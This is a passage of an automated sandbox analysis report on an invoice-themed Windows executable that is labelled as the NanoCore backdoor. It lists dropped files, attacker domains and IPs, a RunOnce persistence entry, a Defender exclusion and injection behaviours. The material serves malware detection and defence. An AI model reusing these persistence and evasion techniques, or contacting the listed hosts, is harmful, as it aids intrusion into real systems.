C:\Users\user\AppData\...\AdvancedRun.exe, PE32 28->55 dropped 89 Multi AV Scanner detection for dropped file 28->89 91 Machine Learning detection for dropped file 28->91 93 Adds a directory exclusion to Windows Defender 28->93 95 Tries to delay execution (extensive OutputDebugStringW loop) 28->95 43 powershell.exe 28->43         started        45 AdvancedRun.exe 28->45         started        71 coroloboxorozor.com 30->71 57 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 30->57 dropped 97 System process connects to network (likely due to code injection or exploit) 30->97 99 Hides threads from debuggers 30->99 101 Injects a PE file into a foreign processes 30->101 47 conhost.exe 34->47         started        49 conhost.exe 34->49         started        file9 signatures10 process11 dnsIp12 73 192.168.2.1 unknown unknown 36->73 51 conhost.exe 43->51         started        process13

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        CN-Invoice-XXXXX9808-19011143287990.exe26%ReversingLabsByteCode-MSIL.Backdoor.NanoBot
        CN-Invoice-XXXXX9808-19011143287990.exe100%Joe Sandbox ML

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe100%Joe Sandbox ML
        C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe26%ReversingLabsByteCode-MSIL.Backdoor.NanoBot
        C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe3%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\1cc51949-2752-4134-b6cf-961241419db1\AdvancedRun.exe3%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\1cc51949-2752-4134-b6cf-961241419db1\AdvancedRun.exe0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe3%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe0%ReversingLabs

        Unpacked PE Files

        No Antivirus matches

        Domains

        SourceDetectionScannerLabelLink
        coroloboxorozor.com0%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://coroloboxorozor.com/base/95912DAC735F7FBEA8150232E35CAF73.html0%VirustotalBrowse
        http://coroloboxorozor.com/base/95912DAC735F7FBEA8150232E35CAF73.html0%Avira URL Cloudsafe
        http://ocsp.sectigo.com00%URL Reputationsafe
        http://ocsp.sectigo.com00%URL Reputationsafe
        http://ocsp.sectigo.com00%URL Reputationsafe
        http://ocsp.sectigo.com00%URL Reputationsafe
        http://coroloboxorozor.com0%VirustotalBrowse
        http://coroloboxorozor.com0%Avira URL Cloudsafe
        http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
        http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
        http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
        http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
        https://sectigo.com/CPS0C0%URL Reputationsafe
        https://sectigo.com/CPS0C0%URL Reputationsafe
        https://sectigo.com/CPS0C0%URL Reputationsafe
        https://sectigo.com/CPS0C0%URL Reputationsafe
        https://sectigo.com/CPS0D0%URL Reputationsafe
        https://sectigo.com/CPS0D0%URL Reputationsafe
        https://sectigo.com/CPS0D0%URL Reputationsafe
        https://sectigo.com/CPS0D0%URL Reputationsafe
        http://coroloboxorozor.com/base/751448401274A413C5FF91CCBC4EFF60.html0%Avira URL Cloudsafe
        http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
        http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
        http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
        http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
        http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
        http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
        https://dynamic.t0%URL Reputationsafe
        https://dynamic.t0%URL Reputationsafe
        https://dynamic.t0%URL Reputationsafe
        http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
        http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
        http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
        http://coroloboxorozor.com/base/84D1B49C9212CA5D522F0AF86A906727.html0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        nanopc.linkpc.net
        		185.192.70.170
        		truefalse
          		high
          coroloboxorozor.com
          		104.21.71.230
          		truetrueunknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://coroloboxorozor.com/base/95912DAC735F7FBEA8150232E35CAF73.htmltrue
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          http://coroloboxorozor.com/base/751448401274A413C5FF91CCBC4EFF60.htmltrue
          • Avira URL Cloud: safe
          		unknown
          http://coroloboxorozor.com/base/84D1B49C9212CA5D522F0AF86A906727.htmltrue
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmpfalse
            		high
            http://ocsp.sectigo.com0CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.22.drfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 00000012.00000002.312247860.000001F77323D000.00000004.00000001.sdmpfalse
              		high
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmpfalse
                		high
                https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmpfalse
                  		high
                  https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 00000012.00000002.312247860.000001F77323D000.00000004.00000001.sdmpfalse
                    		high
                    https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 00000012.00000002.312327948.000001F77324F000.00000004.00000001.sdmpfalse
                      		high
                      https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmpfalse
                        		high
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovinceWerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmpfalse
                          		high
                          http://coroloboxorozor.comCN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.471272964.0000000002471000.00000004.00000001.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 00000012.00000003.310849812.000001F773241000.00000004.00000001.sdmpfalse
                            		high
                            http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.22.drfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authenticationWerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmpfalse
                                		high
                                https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmpfalse
                                  		high
                                  https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 00000012.00000003.310574824.000001F77325D000.00000004.00000001.sdmpfalse
                                    		high
                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000012.00000003.310709236.000001F773240000.00000004.00000001.sdmpfalse
                                      		high
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.oWerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmpfalse
                                        		high
                                        https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000012.00000003.310849812.000001F773241000.00000004.00000001.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidWerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmpfalse
                                            		high
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.oWerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmpfalse
                                              		high
                                              https://sectigo.com/CPS0CCN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.22.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              https://sectigo.com/CPS0DCN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.22.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              https://appexmapsappupdate.blob.core.windows.netsvchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmpfalse
                                                		high
                                                http://www.nirsoft.net/AdvancedRun.exe, AdvancedRun.exe, 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000027.00000000.419368466.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.22.drfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.471272964.0000000002471000.00000004.00000001.sdmp, WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://www.bingmapsportal.comsvchost.exe, 00000012.00000002.312067468.000001F773213000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000012.00000002.312247860.000001F77323D000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifierWerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 00000012.00000003.310807979.000001F773244000.00000004.00000001.sdmpfalse
                                                              		high
                                                              https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000012.00000002.312247860.000001F77323D000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 00000012.00000003.310807979.000001F773244000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphoneWerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephoneWerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000012.00000002.312356651.000001F77325A000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sCN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.22.drfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000012.00000002.312247860.000001F77323D000.00000004.00000001.sdmp, svchost.exe, 00000012.00000002.312067468.000001F773213000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000012.00000002.312327948.000001F77324F000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000012.00000003.288221774.000001F773232000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tCN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.22.drfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 00000012.00000002.312356651.000001F77325A000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      https://dynamic.tsvchost.exe, 00000012.00000002.312327948.000001F77324F000.00000004.00000001.sdmp, svchost.exe, 00000012.00000003.310849812.000001F773241000.00000004.00000001.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.22.drfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 00000012.00000003.310807979.000001F773244000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000012.00000002.312356651.000001F77325A000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000012.00000003.310574824.000001F77325D000.00000004.00000001.sdmpfalse
                                                                                                  		high

                                                                                                  Contacted IPs

                                                                                                  • No. of IPs < 25%
                                                                                                  • 25% < No. of IPs < 50%
                                                                                                  • 50% < No. of IPs < 75%
                                                                                                  • 75% < No. of IPs

                                                                                                  Public

                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                  104.21.71.230
                                                                                                  		unknownUnited States
                                                                                                  		13335CLOUDFLARENETUStrue
                                                                                                  185.157.161.86
                                                                                                  		unknownSweden
                                                                                                  		197595OBE-EUROPEObenetworkEuropeSEfalse
                                                                                                  185.192.70.170
                                                                                                  		unknownNetherlands
                                                                                                  		42831UKSERVERS-ASUKDedicatedServersHostingandCo-Locationfalse

                                                                                                  Private

                                                                                                  IP
                                                                                                  192.168.2.1
                                                                                                  127.0.0.1

                                                                                                  General Information

                                                                                                  Joe Sandbox Version:31.0.0 Emerald
                                                                                                  Analysis ID:355838
                                                                                                  Start date:22.02.2021
                                                                                                  Start time:07:44:22
                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                  Overall analysis duration:0h 13m 18s
                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                  Report type:light
                                                                                                  Sample file name:CN-Invoice-XXXXX9808-19011143287990.exe
                                                                                                  Cookbook file name:default.jbs
                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                  Number of analysed new started processes analysed:40
                                                                                                  Number of new started drivers analysed:0
                                                                                                  Number of existing processes analysed:0
                                                                                                  Number of existing drivers analysed:0
                                                                                                  Number of injected processes analysed:0
                                                                                                  Technologies:
                                                                                                  • HCA enabled
                                                                                                  • EGA enabled
                                                                                                  • HDC enabled
                                                                                                  • AMSI enabled
                                                                                                  Analysis Mode:default
                                                                                                  Analysis stop reason:Timeout
                                                                                                  Detection:MAL
                                                                                                  Classification:mal100.troj.evad.winEXE@56/29@6/5
                                                                                                  EGA Information:Failed
                                                                                                  HDC Information:
                                                                                                  • Successful, ratio: 12.8% (good quality ratio 11.9%)
                                                                                                  • Quality average: 80.8%
                                                                                                  • Quality standard deviation: 28.7%
                                                                                                  HCA Information:
                                                                                                  • Successful, ratio: 86%
                                                                                                  • Number of executed functions: 0
                                                                                                  • Number of non-executed functions: 0
                                                                                                  Cookbook Comments:
                                                                                                  • Adjust boot time
                                                                                                  • Enable AMSI
                                                                                                  • Found application associated with file extension: .exe
                                                                                                  Warnings:
                                                                                                  Show All
                                                                                                  • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, WmiPrvSE.exe
                                                                                                  • TCP Packets have been reduced to 100
                                                                                                  • Excluded IPs from analysis (whitelisted): 51.104.139.180, 204.79.197.200, 13.107.21.200, 93.184.220.29, 104.43.139.144, 92.122.145.220, 52.255.188.83, 92.122.144.200, 51.103.5.186, 51.11.168.160, 92.122.213.194, 92.122.213.247, 104.42.151.234, 20.54.26.129, 168.61.161.212
                                                                                                  • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, cs9.wac.phicdn.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, skypedataprdcolcus17.cloudapp.net, skypedataprdcolcus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net
                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                  Simulations

                                                                                                  Behavior and APIs

                                                                                                  TimeTypeDescription
                                                                                                  07:45:27API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                  07:45:30AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce fIvxwJDVdGdMfCgtYuXwXFIxLX explorer.exe "C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe"
                                                                                                  07:45:38AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce fIvxwJDVdGdMfCgtYuXwXFIxLX explorer.exe "C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe"
                                                                                                  07:45:54API Interceptor41x Sleep call for process: powershell.exe modified
                                                                                                  07:46:43API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                  Joe Sandbox View / Context

                                                                                                  IPs

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                  104.21.71.230PurchaseOrdersCSTtyres004786587.exeGet hashmaliciousBrowse
                                                                                                  • coroloboxorozor.com/base/532020C7A3B820370CFAAC4888397C0C.html
                                                                                                  185.157.161.86CN-Invoice-XXXXX9808-19011143287990.exeGet hashmaliciousBrowse
                                                                                                    Order_List_PO# 081929.exeGet hashmaliciousBrowse
                                                                                                      order-1812896543124646450.exeGet hashmaliciousBrowse
                                                                                                        order-181289654312464649.exeGet hashmaliciousBrowse
                                                                                                          order-181289654312464648.exeGet hashmaliciousBrowse
                                                                                                            Order_1101201918_AUTECH.exeGet hashmaliciousBrowse
                                                                                                              50404868-c352-422f-a608-7fd64b335eec.exeGet hashmaliciousBrowse
                                                                                                                74725794.pdf.exeGet hashmaliciousBrowse
                                                                                                                  Order_List_PO# 0819289.exeGet hashmaliciousBrowse

                                                                                                                    Domains

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                    coroloboxorozor.comINVOICE_47383.EXEGet hashmaliciousBrowse
                                                                                                                    • 172.67.172.17
                                                                                                                    PurchaseOrdersCSTtyres004786587.exeGet hashmaliciousBrowse
                                                                                                                    • 104.21.71.230
                                                                                                                    nanopc.linkpc.netCN-Invoice-XXXXX9808-19011143287990.exeGet hashmaliciousBrowse
                                                                                                                    • 185.157.161.86
                                                                                                                    Order_List_PO# 081929.exeGet hashmaliciousBrowse
                                                                                                                    • 185.157.161.86
                                                                                                                    order-1812896543124646450.exeGet hashmaliciousBrowse
                                                                                                                    • 185.157.161.86
                                                                                                                    order-181289654312464649.exeGet hashmaliciousBrowse
                                                                                                                    • 185.157.161.86
                                                                                                                    order-181289654312464648.exeGet hashmaliciousBrowse
                                                                                                                    • 185.157.161.86
                                                                                                                    ORDER PMX-PT-2001 STOCK+NOVO.exeGet hashmaliciousBrowse
                                                                                                                    • 185.157.162.81
                                                                                                                    DHL_10177_R293_DOCUMENT.exeGet hashmaliciousBrowse
                                                                                                                    • 105.112.101.201

                                                                                                                    ASN

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                    CLOUDFLARENETUSSelected New Order.exeGet hashmaliciousBrowse
                                                                                                                    • 104.21.19.200
                                                                                                                    Unterlagen PDF.exeGet hashmaliciousBrowse
                                                                                                                    • 162.159.129.233
                                                                                                                    RFQ file_pdf.exeGet hashmaliciousBrowse
                                                                                                                    • 104.21.19.200
                                                                                                                    abominable.exeGet hashmaliciousBrowse
                                                                                                                    • 1.1.1.1
                                                                                                                    Copy_remittnce.exeGet hashmaliciousBrowse
                                                                                                                    • 162.159.130.233
                                                                                                                    uTorrent.exeGet hashmaliciousBrowse
                                                                                                                    • 104.18.88.101
                                                                                                                    uTorrent.exeGet hashmaliciousBrowse
                                                                                                                    • 104.18.88.101
                                                                                                                    Purchase order.exeGet hashmaliciousBrowse
                                                                                                                    • 23.227.38.74
                                                                                                                    SecuriteInfo.com.W32.AIDetectGBM.malware.02.16429.exeGet hashmaliciousBrowse
                                                                                                                    • 104.21.50.15
                                                                                                                    SecuriteInfo.com.Variant.Zusy.340597.28655.exeGet hashmaliciousBrowse
                                                                                                                    • 104.17.62.50
                                                                                                                    Order.exeGet hashmaliciousBrowse
                                                                                                                    • 104.21.19.200
                                                                                                                    purchase order.exeGet hashmaliciousBrowse
                                                                                                                    • 172.67.188.154
                                                                                                                    PURCHASE ORDER.exeGet hashmaliciousBrowse
                                                                                                                    • 172.67.188.154
                                                                                                                    telex transfer.exeGet hashmaliciousBrowse
                                                                                                                    • 104.21.19.200
                                                                                                                    AgroAG008021921doc_pdf.exeGet hashmaliciousBrowse
                                                                                                                    • 23.227.38.74
                                                                                                                    docs-9035.exeGet hashmaliciousBrowse
                                                                                                                    • 162.159.129.233
                                                                                                                    MPC-PU-FO-0011-00 .exeGet hashmaliciousBrowse
                                                                                                                    • 162.159.134.233
                                                                                                                    JFAaEh5hB6.exeGet hashmaliciousBrowse
                                                                                                                    • 172.67.141.244
                                                                                                                    Njs4kjnD5X.dllGet hashmaliciousBrowse
                                                                                                                    • 104.20.185.68
                                                                                                                    INVOICE_47383.EXEGet hashmaliciousBrowse
                                                                                                                    • 172.67.172.17
                                                                                                                    UKSERVERS-ASUKDedicatedServersHostingandCo-Locationhttps://podcasterz.hu/softaculous/RjcHrladaah1w/Get hashmaliciousBrowse
                                                                                                                    • 31.132.1.41
                                                                                                                    https://caminhodosveadeiros.com.br/h/Ld51n5yo2sVpA9ix2ZHZLqX7/Get hashmaliciousBrowse
                                                                                                                    • 31.132.1.41
                                                                                                                    http://blackbarrymobile.comGet hashmaliciousBrowse
                                                                                                                    • 94.229.72.119
                                                                                                                    https://theautomaticacademy.co.uk/.adv3738diukjuctdyakbd/dhava93vdia11876dkb/ag38vdua3848dk/sajvd9484auad/ajd847vauadja/101kah474sbbadad/wose/Creed20200921_2219.pdf.htmlGet hashmaliciousBrowse
                                                                                                                    • 91.109.113.202
                                                                                                                    https://www.linkedin.com/redir/redirect?url=kjifs%2Ehijkrest%2Exyz%2F%405067%4012180%40%2F&urlhash=3yN5&#raju.daswani@fastmarkets.comGet hashmaliciousBrowse
                                                                                                                    • 5.101.151.31
                                                                                                                    https://www.louviers-houseofbeauty.co.uk/fcub/roundcube/index.php?email=marta.valadas@novobanco.ptGet hashmaliciousBrowse
                                                                                                                    • 91.109.113.202
                                                                                                                    https://www.louviers-houseofbeauty.co.uk/fcub/roundcube/index.php?email=marta.valadas@novobanco.ptGet hashmaliciousBrowse
                                                                                                                    • 91.109.113.202
                                                                                                                    http://flamme.coGet hashmaliciousBrowse
                                                                                                                    • 94.229.72.116
                                                                                                                    Quote Order #103888864.exeGet hashmaliciousBrowse
                                                                                                                    • 94.229.65.194
                                                                                                                    isb777amx.exeGet hashmaliciousBrowse
                                                                                                                    • 91.244.181.85
                                                                                                                    http://cs.tekblue.netGet hashmaliciousBrowse
                                                                                                                    • 94.229.72.121
                                                                                                                    ErxMjVrB.exeGet hashmaliciousBrowse
                                                                                                                    • 94.229.71.167
                                                                                                                    juice.exeGet hashmaliciousBrowse
                                                                                                                    • 156.227.195.1
                                                                                                                    3a#U0430.exeGet hashmaliciousBrowse
                                                                                                                    • 94.229.72.243
                                                                                                                    430#U0437.jsGet hashmaliciousBrowse
                                                                                                                    • 178.159.0.38
                                                                                                                    430#U0437.jsGet hashmaliciousBrowse
                                                                                                                    • 178.159.0.38
                                                                                                                    70payment $37,140.exeGet hashmaliciousBrowse
                                                                                                                    • 191.101.22.90
                                                                                                                    30NEW ORDER.exeGet hashmaliciousBrowse
                                                                                                                    • 191.101.22.21
                                                                                                                    6LQNTVfdpa.exeGet hashmaliciousBrowse
                                                                                                                    • 191.101.22.12
                                                                                                                    2sapfile_pdf.exeGet hashmaliciousBrowse
                                                                                                                    • 191.101.22.12
                                                                                                                    OBE-EUROPEObenetworkEuropeSEJFAaEh5hB6.exeGet hashmaliciousBrowse
                                                                                                                    • 45.148.16.42
                                                                                                                    BMfiIGROO2.exeGet hashmaliciousBrowse
                                                                                                                    • 45.148.16.42
                                                                                                                    SLAX3807432211884DL772508146394DO.exeGet hashmaliciousBrowse
                                                                                                                    • 194.32.146.140
                                                                                                                    CN-Invoice-XXXXX9808-19011143287990.exeGet hashmaliciousBrowse
                                                                                                                    • 185.157.161.86
                                                                                                                    18.02.2021 PAYMENT INFO.exeGet hashmaliciousBrowse
                                                                                                                    • 185.157.160.233
                                                                                                                    DHL_Shipment_Notofication#554334.exeGet hashmaliciousBrowse
                                                                                                                    • 217.64.149.164
                                                                                                                    07oof4WcEB.exeGet hashmaliciousBrowse
                                                                                                                    • 45.148.16.42
